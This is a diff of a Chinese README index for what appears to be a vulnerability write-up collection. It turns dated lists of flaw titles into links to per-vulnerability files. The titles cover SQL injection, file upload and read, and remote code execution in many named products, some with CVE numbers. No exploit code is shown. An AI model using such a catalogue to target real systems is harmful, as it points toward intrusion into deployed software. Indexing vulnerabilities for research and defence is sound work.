+- [亿华人力资源管理系统unloadfile存在任意文件上传漏洞](./亿华人力资源管理系统/亿华人力资源管理系统unloadfile存在任意文件上传漏洞.md)
+- [EnjoyRMIS-GetOAById存在SQL注入漏洞](./EnjoyRMIS/EnjoyRMIS-GetOAById存在SQL注入漏洞.md)
+- [亿渡留言管理系统uploadimg存在任意文件上传漏洞](./亿渡留言管理系统/亿渡留言管理系统uploadimg存在任意文件上传漏洞.md)
+- [宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞](./宏脉医美行业管理系统/宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞.md)
+- [Exam在线考试系统存在前台任意文件上传漏洞](./Exam/Exam在线考试系统存在前台任意文件上传漏洞.md)
+- [彩票系统存在任意文件preview.php上传漏洞](./菠菜/彩票系统存在任意文件preview.php上传漏洞.md)
+- [会捷通云视讯平台fileDownload存在任意文件读取漏洞](./会捷通云视讯平台/会捷通云视讯平台fileDownload存在任意文件读取漏洞.md)
+- [正方数字化校园平台RzptManage存在任意文件写入漏洞](./正方/正方数字化校园平台RzptManage存在任意文件写入漏洞.md)
+- [鲸发卡系统自动发卡网request_post存在任意文件读取漏洞](./发卡网系统/鲸发卡系统自动发卡网request_post存在任意文件读取漏洞.md)
+- [用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞](./用友OA/用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞.md)
 
 ## 2024.07.06 新增漏洞
 
-- 宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞
-- 宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞
-- 宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞
-- 宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞
-- 平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞
-- Docassemble任意文件读取漏洞(CVE-2024-27292) 
-- WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709)
-- rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943)
-- Splunk-Enterprise任意文件读取漏洞
+- [宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞.md)
+- [宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞.md)
+- [宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞.md)
+- [宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞](./宏景OA/宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞.md)
+- [平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞](./平升电子水库监管平台/平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞.md)
+- [Docassemble任意文件读取漏洞(CVE-2024-27292) ](./Docassemble/Docassemble任意文件读取漏洞(CVE-2024-27292).md)
+- [WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709)](./WordPress/WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709).md)
+- [rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943)](./HSF/rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943).md)
+- [Splunk-Enterprise任意文件读取漏洞](./Splunk%20Enterprise/Splunk-Enterprise任意文件读取漏洞.md)
 
 ## 2024.07.03 新增漏洞
 
-- 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞
-- 科荣AIO-moffice接口存在SQL注入漏洞
-- 朗新天霁人力资源管理系统GetMessage存在sql注入漏洞
-- 用友u9系统接口GetConnectionString存在信息泄露漏洞
-- YzmCMS接口存在pay_callback远程命令执行
-- 美特CRM系统接口anotherValue存在FastJson反序列化RCE
-- 飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞
-- 飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞
-- 大华ICC智能物联综合管理平台heapdump敏感信息泄露
-- 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞
-- GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401)
-- D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)
-- 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞
-- JieLink+智能终端操作平台存在sql注入漏洞
-- 金斗云-HKMP智慧商业软件任意用户添加漏洞
-- 热网无线监测系统SystemManager.asmx存在SQL注入漏洞
-- 喰星云-数字化餐饮服务系统listuser信息泄露漏洞
-- 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞
-- 锐明技术Crocus系统Service.do任意文件读取漏洞
+- [金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞](./金和OA/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md)
+- [科荣AIO-moffice接口存在SQL注入漏洞](./科荣AIO/科荣AIO-moffice接口存在SQL注入漏洞.md)
+- [朗新天霁人力资源管理系统GetMessage存在sql注入漏洞](./朗新天霁人力资源管理系统/朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md)
+- [用友u9系统接口GetConnectionString存在信息泄露漏洞](./用友OA/用友u9系统接口GetConnectionString存在信息泄露漏洞.md)
+- [YzmCMS接口存在pay_callback远程命令执行](./YzmCMS/YzmCMS接口存在pay_callback远程命令执行.md)
+- [美特CRM系统接口anotherValue存在FastJson反序列化RCE](./美特CRM系统/美特CRM系统接口anotherValue存在FastJson反序列化RCE.md)
+- [飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞](./飞企互联/飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md)
+- [飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞](./飞企互联/飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md)
+- [大华ICC智能物联综合管理平台heapdump敏感信息泄露](./大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md)
+- [英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞](./英飞达医学影像存档与通信系统/英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md)
+- [GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401)](./GeoServer/GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401).md)
+- [D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)](./D-Link/D-LINK-Go-RT-AC750%20GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md)
+- [致远OA-A8-V5接口officeservlet存在任意文件读取漏洞](./致远OA/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md)
+- [JieLink+智能终端操作平台存在sql注入漏洞](./JieLink/JieLink+智能终端操作平台存在sql注入漏洞.md)
+- [金斗云-HKMP智慧商业软件任意用户添加漏洞](./金斗云/金斗云-HKMP智慧商业软件任意用户添加漏洞.md)
+- [热网无线监测系统SystemManager.asmx存在SQL注入漏洞](./热网无线监测系统/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md)
+- [喰星云-数字化餐饮服务系统listuser信息泄露漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md)
+- [邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞](./邦永PM2项目管理系统/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md)
+- [锐明技术Crocus系统Service.do任意文件读取漏洞](./锐明技术Crocus系统/锐明技术Crocus系统Service.do任意文件读取漏洞.md)
 
 ## 2024.06.28 新增漏洞
 
-- WordPress插件Dokan-Pro存在SQL注入漏洞
-- 时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞
-- Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313)
-- 通天星CMSV6接口pointManage存在SQL注入
-- 用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞
-- WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512)
-- Apache-Kafka的UI中的远程代码执行CVE-2023-52251
-- 碧海威L7产品confirm存在命令执行漏洞
-- 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞
-- 医药信息管理系统GetLshByTj存在SQL注入
-- MSService服务init.do接口处存在SQL注入漏洞
-- Pear-Admin-Boot存在SQL注入漏洞
-- 福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞
-- Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞
-- 铭飞MCMS接口upload.do存在任意文件上传漏洞
-- OpenCart开源电子商务平台divido.php存在SQL注入漏洞
-- D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞
-- 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞
-- 飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞
-- 金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞
+- [WordPress插件Dokan-Pro存在SQL注入漏洞](./WordPress/WordPress插件Dokan-Pro存在SQL注入漏洞.md)
+- [时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞](./云时空/时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞.md)
+- [Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313)](./Apache/Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313).md)
+- [通天星CMSV6接口pointManage存在SQL注入](./通天星/通天星CMSV6接口pointManage存在SQL注入.md)
+- [用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞](./用友OA/用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞.md)
+- [WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512)](./WordPress/WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512).md)
+- [Apache-Kafka的UI中的远程代码执行CVE-2023-52251](./Apache/Apache-Kafka的UI中的远程代码执行CVE-2023-52251.md)
+- [碧海威L7产品confirm存在命令执行漏洞](./碧海威/碧海威L7产品confirm存在命令执行漏洞.md)
+- [万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞](./万户OA/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md)
+- [医药信息管理系统GetLshByTj存在SQL注入](./医药信息管理系统/医药信息管理系统GetLshByTj存在SQL注入.md)
+- [MSService服务init.do接口处存在SQL注入漏洞](./MSService/MSService服务init.do接口处存在SQL注入漏洞.md)
+- [Pear-Admin-Boot存在SQL注入漏洞](./Pear%20Admin%20Boot/Pear-Admin-Boot存在SQL注入漏洞.md)
+- [福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞](./福建科立讯通信/福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞.md)
+- [Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞](./Magento/Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞.md)
+- [铭飞MCMS接口upload.do存在任意文件上传漏洞](./铭飞/铭飞MCMS接口upload.do存在任意文件上传漏洞.md)
+- [OpenCart开源电子商务平台divido.php存在SQL注入漏洞](./OpenCart/OpenCart开源电子商务平台divido.php存在SQL注入漏洞.md)
+- [D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞](./D-Link/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md)
+- [致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞](./致远OA/致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md)
+- [飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台_efficientCodewidget39接口SQL注入漏洞.md)
+- [金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞](./金和OA/金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md)
 
 ## 2024.06.21 新增漏洞
 
-- 真内控国产化开发平台接口preview任意文件读取漏洞
-- 华测监测预警系统接口UserEdit.aspx存在SQL注入
-- ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)
-- 契约锁电子签章平台add远程命令执行漏洞
-- Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
-- 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞
-- XWiki-Platform远程代码执行漏洞
-- 学分制系统GetCalendarContentById存在SQL注入漏洞
-- 云匣子系统接口ssoToolReport存在远程代码执行漏洞
-- 泛微E-Cology-KtreeUploadAction任意文件上传漏洞
-- 极限OA接口video_file.php存在任意文件读取漏洞
-- 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
-- 佑友防火墙后台接口download存在任意文件读取漏洞
-- 佑友防火墙后台接口maintain存在命令执行漏洞
-- 极企智能办公路由接口jumper.php存在RCE漏洞
-- 用友Ufida-ELTextFile.load.d任意文件读取漏洞
-- 易天智能eHR管理平台任意用户添加漏洞
-- 多客圈子论坛前台SSRF漏洞
-- APP分发签名系统index-uplog.php存在任意文件上传漏洞
+- [真内控国产化开发平台接口preview任意文件读取漏洞](./真内控国产化开发平台/真内控国产化开发平台接口preview任意文件读取漏洞.md)
+- [华测监测预警系统接口UserEdit.aspx存在SQL注入](./华测监测预警系统/华测监测预警系统接口UserEdit.aspx存在SQL注入.md)
+- [ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)](./ShokoServer/ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md)
+- [契约锁电子签章平台add远程命令执行漏洞](./契约锁电子签章系统/契约锁电子签章平台add远程命令执行漏洞.md)
+- [Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)](./Zyxe%20NAS/Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md)
+- [新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞](./新视窗新一代物业管理系统/新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md)
+- [XWiki-Platform远程代码执行漏洞](./XWiki/XWiki-Platform远程代码执行漏洞.md)
+- [学分制系统GetCalendarContentById存在SQL注入漏洞](./学分制系统/学分制系统GetCalendarContentById存在SQL注入漏洞.md)
+- [云匣子系统接口ssoToolReport存在远程代码执行漏洞](./云匣子堡垒机/云匣子系统接口ssoToolReport存在远程代码执行漏洞.md)
+- [泛微E-Cology-KtreeUploadAction任意文件上传漏洞](./泛微OA/泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md)
+- [极限OA接口video_file.php存在任意文件读取漏洞](./极限OA/极限OA接口video_file.php存在任意文件读取漏洞.md)
+- [锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞](./锐捷/锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md)
+- [佑友防火墙后台接口download存在任意文件读取漏洞](./佑友防火墙/佑友防火墙后台接口download存在任意文件读取漏洞.md)
+- [佑友防火墙后台接口maintain存在命令执行漏洞](./佑友防火墙/佑友防火墙后台接口maintain存在命令执行漏洞.md)
+- [极企智能办公路由接口jumper.php存在RCE漏洞](./路由器/极企智能办公路由接口jumper.php存在RCE漏洞.md)
+- [用友Ufida-ELTextFile.load.d任意文件读取漏洞](./用友OA/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md)
+- [易天智能eHR管理平台任意用户添加漏洞](./易天智能eHR管理平台/易天智能eHR管理平台任意用户添加漏洞.md)
+- [多客圈子论坛前台SSRF漏洞](./多客圈子论坛系统/多客圈子论坛前台SSRF漏洞.md)
+- [APP分发签名系统index-uplog.php存在任意文件上传漏洞](./分发签名系统/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md)
 
 ## 2024.06.18 新增漏洞
 
-- 禅道18.5存在后台命令执行漏洞
-- Fastadmin框架存在任意文件读取漏洞
-- CRMEB开源商城v5.2.2存在sql注入漏洞
-- AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)
-- 悦库企业网盘userlogin.html存在SQL注入漏洞
-- 仿新浪外汇余额宝时间交易所任意文件读取
-- 申瓯通信在线录音管理系统download任意文件读取漏洞
-- 致远互联FE协作办公平台ncsubjass存在SQL注入
-- 世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞
-- 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
-- 平升水库水文监测系统默认密码
+- [禅道18.5存在后台命令执行漏洞](./禅道/禅道18.5存在后台命令执行漏洞.md)
+- [Fastadmin框架存在任意文件读取漏洞](./Fastadmin/Fastadmin框架存在任意文件读取漏洞.md)
+- [CRMEB开源商城v5.2.2存在sql注入漏洞](./CRMEB/CRMEB开源商城v5.2.2存在sql注入漏洞.md)
+- [AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)](./AEGON/AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md)
+- [悦库企业网盘userlogin.html存在SQL注入漏洞](./悦库企业网盘/悦库企业网盘userlogin.html存在SQL注入漏洞.md)
+- [仿新浪外汇余额宝时间交易所任意文件读取](./交易所系统/仿新浪外汇余额宝时间交易所任意文件读取.md)
+- [申瓯通信在线录音管理系统download任意文件读取漏洞](./申瓯通信在线录音管理系统/申瓯通信在线录音管理系统download任意文件读取漏洞.md)
+- [致远互联FE协作办公平台ncsubjass存在SQL注入](./致远OA/致远互联FE协作办公平台ncsubjass存在SQL注入.md)
+- [世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞](./世邦通信/世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞.md)
+- [万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞](./万户OA/万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞.md)
+- [平升水库水文监测系统默认密码](./平升电子水库监管平台/平升水库水文监测系统默认密码.md)
 
 ## 2024.06.14 新增漏洞
 
-- 致远oa系统saveFormula4Cloud存在JNDI注入
-- 用友NC-oacoSchedulerEvents接口存在sql注入漏洞
-- 致远OA帆软组件ReportServer目录遍历漏洞
-- 泛微-eoffice-webservice-file-upload任意文件上传漏洞
-- 泛微e-office-mobile_upload_save存在任意文件上传漏洞
-- 泛微e-office-uploadify.php存在任意文件上传漏洞
-- 世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞
-- 电信网关配置管理后台del_file.php接口存在命令执行漏洞
-- Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824)
-- JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞
-- 东胜物流软件GetProParentModuTreeList存在SQL注入漏洞
-- 锐捷NBR系列路由器存在管理员密码重置漏洞
-- 海洋CMS-admin_notify.php远程代码执行漏洞
-- SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995)
+- [致远oa系统saveFormula4Cloud存在JNDI注入](./致远OA/致远oa系统saveFormula4Cloud存在JNDI注入.md)
+- [用友NC-oacoSchedulerEvents接口存在sql注入漏洞](./用友OA/用友NC-oacoSchedulerEvents接口存在sql注入漏洞.md)
+- [致远OA帆软组件ReportServer目录遍历漏洞](./致远OA/致远OA帆软组件ReportServer目录遍历漏洞.md)
+- [泛微-eoffice-webservice-file-upload任意文件上传漏洞](./泛微OA/泛微-eoffice-webservice-file-upload任意文件上传漏洞.md)
+- [泛微e-office-mobile_upload_save存在任意文件上传漏洞](./泛微OA/泛微e-office-mobile_upload_save存在任意文件上传漏洞.md)
+- [泛微e-office-uploadify.php存在任意文件上传漏洞](./泛微OA/泛微e-office-uploadify.php存在任意文件上传漏洞.md)
+- [世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞](./世邦通信/世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞.md)
+- [电信网关配置管理后台del_file.php接口存在命令执行漏洞](./电信网关配置管理/电信网关配置管理后台del_file.php接口存在命令执行漏洞.md)
+- [Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824)](./Ivanti/Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824).md)
+- [JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞](./JEPaaS低代码平台/JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞.md)
+- [东胜物流软件GetProParentModuTreeList存在SQL注入漏洞](./东胜物流软件/东胜物流软件GetProParentModuTreeList存在SQL注入漏洞.md)
+- [锐捷NBR系列路由器存在管理员密码重置漏洞](./锐捷/锐捷NBR系列路由器存在管理员密码重置漏洞.md)
+- [海洋CMS-admin_notify.php远程代码执行漏洞](./海洋cms/海洋CMS-admin_notify.php远程代码执行漏洞.md)
+- [SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995)](./SolarWinds%20Serv%20U/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md)
 
 ## 2024.06.11 新增漏洞
 
-- 海康威视综合安防管理平台keepAlive远程代码执行漏洞
-- 金和OA-C6-download.jsp任意文件读取漏洞
-- 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116)
-- HFS2.3未经身份验证的远程代码执行(CVE-2024-23692)
-- 29网课交单平台epay.php存在SQL注入漏洞
-- 多客圈子论坛系统httpGet任意文件读取漏洞复现
+- [海康威视综合安防管理平台keepAlive远程代码执行漏洞](./海康威视/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md)
+- [金和OA-C6-download.jsp任意文件读取漏洞](./金和OA/金和OA-C6-download.jsp任意文件读取漏洞.md)
+- [锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116)](./锐捷/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md)
+- [HFS2.3未经身份验证的远程代码执行(CVE-2024-23692)](./HSF/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md)
+- [29网课交单平台epay.php存在SQL注入漏洞](./网课交单平台/29网课交单平台epay.php存在SQL注入漏洞.md)
+- [多客圈子论坛系统httpGet任意文件读取漏洞复现](./多客圈子论坛系统/多客圈子论坛系统httpGet任意文件读取漏洞复现.md)
 
 ## 2024.06.07 新增漏洞
 
-- 天智云智造管理平台Usermanager.ashx存在SQL注入漏洞
-- 海康威视综合安防管理平台productFile远程代码执行
-- 海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞
-- showdoc3.2.4-phar反序列漏洞复现
-- Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358)
-- 悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052)
-- PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577)
-- 用友NC-downCourseWare任意文件读取
-- 用友-U9-PatchFile.asmx任意文件上传漏洞
-- Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)
+- [天智云智造管理平台Usermanager.ashx存在SQL注入漏洞](./天智云/天智云智造管理平台Usermanager.ashx存在SQL注入漏洞.md)
+- [海康威视综合安防管理平台productFile远程代码执行](./海康威视/海康威视综合安防管理平台productFile远程代码执行.md)
+- [海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞](./海康威视/海康威视综合安防管理平台applyAutoLoginTicket远程代码执行漏洞.md)
+- [showdoc3.2.4-phar反序列漏洞复现](./showdoc/showdoc3.2.4-phar反序列漏洞复现.md)
+- [Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358)](./Progress/Progress-Telerik-Report-Server身份验证绕过(CVE-2024-4358).md)
+- [悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052)](./悟空CRM/悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052).md)
+- [PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577)](./php/PHP-CGI-Windows平台远程代码执行漏洞(CVE-2024-4577).md)
+- [用友NC-downCourseWare任意文件读取](./用友OA/用友NC-downCourseWare任意文件读取.md)
+- [用友-U9-PatchFile.asmx任意文件上传漏洞](./用友OA/用友-U9-PatchFile.asmx任意文件上传漏洞.md)
+- [Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)](./Apache/Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348).md)
 
 ## 2024.06.05 新增漏洞
 
-- Symfony-app_dev.php信息泄露漏洞
-- 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞
-- O2OA远程命令执行(CVE-2022-22916)
-- 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞
-- H3C-CVM-upload接口前台任意文件上传漏洞复现
-- 用友NC-pagesServlet存在SQL注入
-- 宏景HCM-pos_dept_post存在SQL注入漏洞
-- 迈普多业务融合网关send_order.cgi存在命令执行漏洞
-- HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)
-- Minio-verify信息泄露(CVE-2023-28432)
-- OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428)
-- ShowDoc3.2.5存在SQL注入漏洞
-- mysql2原型污染漏洞(CVE-2024-21512)
-- 亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞
-- Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)
-- 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞
-- 泛微E-Office-json_common.phpSQL注入漏洞
-- 泛微E-Office系统login_other.php存在sql注入漏洞
+- [Symfony-app_dev.php信息泄露漏洞](./Symfony/Symfony-app_dev.php信息泄露漏洞.md)
+- [泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞](./泛微OA/泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md)
+- [O2OA远程命令执行(CVE-2022-22916)](./O2OA/O2OA远程命令执行(CVE-2022-22916).md)
+- [大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞](./大华/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md)
+- [H3C-CVM-upload接口前台任意文件上传漏洞复现](./H3C/H3C-CVM-upload接口前台任意文件上传漏洞复现.md)
+- [用友NC-pagesServlet存在SQL注入](./用友OA/用友NC-pagesServlet存在SQL注入.md)
+- [宏景HCM-pos_dept_post存在SQL注入漏洞](./宏景OA/宏景HCM-pos_dept_post存在SQL注入漏洞.md)
+- [迈普多业务融合网关send_order.cgi存在命令执行漏洞](./迈普多业务融合网关/迈普多业务融合网关send_order.cgi存在命令执行漏洞.md)
+- [HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)](./HSC/HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470).md)
+- [Minio-verify信息泄露(CVE-2023-28432)](./Minio/Minio-verify信息泄露(CVE-2023-28432).md)
+- [OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428)](./OrangeHRM/OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428).md)
+- [ShowDoc3.2.5存在SQL注入漏洞](./showdoc/ShowDoc3.2.5存在SQL注入漏洞.md)
+- [mysql2原型污染漏洞(CVE-2024-21512)](./mysql2/mysql2原型污染漏洞(CVE-2024-21512).md)
+- [亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞](./亿赛通电子文档安全管理系统/亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞.md)
+- [Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)](./Apache/Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104).md)
+- [飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞.md)
+- [泛微E-Office-json_common.phpSQL注入漏洞](./泛微OA/泛微E-Office-json_common.phpSQL注入漏洞.md)
+- [泛微E-Office系统login_other.php存在sql注入漏洞](./泛微OA/泛微E-Office系统login_other.php存在sql注入漏洞.md)
 
 ## 2024.06.02 新增漏洞
 
-- 海康威视综合安防download存在任意文件读取漏洞
-- 科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入
-- 翰智员工服务平台loginByPassword存在SQL注入漏洞
-- DT高清车牌识别摄像机存在任意文件读取漏洞
-- showDoc-uploadImg任意文件上传漏洞
-- 全程云OA-svc.asmxSQL注入漏洞
+- [海康威视综合安防download存在任意文件读取漏洞](./海康威视/海康威视综合安防download存在任意文件读取漏洞.md)
+- [科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入](./科讯图书馆综合管理云平台/科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md)
+- [翰智员工服务平台loginByPassword存在SQL注入漏洞](./翰智员工服务平台/翰智员工服务平台loginByPassword存在SQL注入漏洞.md)
+- [DT高清车牌识别摄像机存在任意文件读取漏洞](./DT/DT高清车牌识别摄像机存在任意文件读取漏洞.md)
+- [showDoc-uploadImg任意文件上传漏洞](./showdoc/showDoc-uploadImg任意文件上传漏洞.md)
+- [全程云OA-svc.asmxSQL注入漏洞](./全程云OA/全程云OA-svc.asmxSQL注入漏洞.md)
 - 中国移动云控制台存在任意文件读取
-- 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞
-- 金蝶云星空UserService反序列化漏洞
-- 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞
+- [泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞](./泛微OA/泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞.md)
+- [金蝶云星空UserService反序列化漏洞](./金蝶/金蝶云星空UserService反序列化漏洞.md)
